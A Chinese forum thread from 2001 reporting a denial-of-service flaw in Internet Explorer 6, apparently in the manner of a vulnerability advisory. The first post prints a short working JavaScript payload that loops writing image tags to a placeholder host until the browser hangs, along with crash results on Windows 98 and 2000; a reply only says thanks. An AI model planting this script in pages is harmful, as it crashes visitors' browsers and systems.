社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
主题 : 恶意脚本能够使IE6浏览器崩溃!!!  
级别: 圣骑士
显示用户信息 
0  发表于: 2001-12-29   

恶意脚本能够使IE6浏览器崩溃!!!  

微软的IE浏览器存在一个拒绝服务漏洞,恶意攻击者能够构造一个javascript脚本造成CPU的消耗
并导致崩溃!!!

代码如下:
[code]
<script>
for(i=0;i<100000000;i++) {
document.write("<img src=http://fakehost.com/"+i+".gif>");
}
</script>[/code]

在Windows98的IE6(build 2600)版本,能造成IE的不响应,当试图终止任务的时候,将造成操作
系统的崩溃。

在Windows2000的IE6(build 2600)版本,能造成50%的CPU被长时间利用,之后浏览器会询问是否让
用户终止脚本。

 这个漏洞也存在少量的内存消耗。

 解决办法:目前微软还没有相对应的补丁!!!
 
---------------------------------------
我玩了一下,发现内存在很快的不断减少。
我马上就强行关闭浏览器了……

[b][font=tahoma]The future is not set. There is no fate but what we make for ourselves![/b][/font]
级别: 圣骑士
显示用户信息 
1  发表于: 2001-12-29   
回复:
[color=royalblue]呃……多谢……[/color]
[wdb9]
在人群里,永远特殊寂寞而陌生;
没有了人群,又变得平凡欢悦而空白.
那就用一束彩色铅笔,把人群中的每个人涂上各种颜色,
至于自己,等最后再决定要素描、要水彩还是留白...
描述
快速回复

按"Ctrl+Enter"直接提交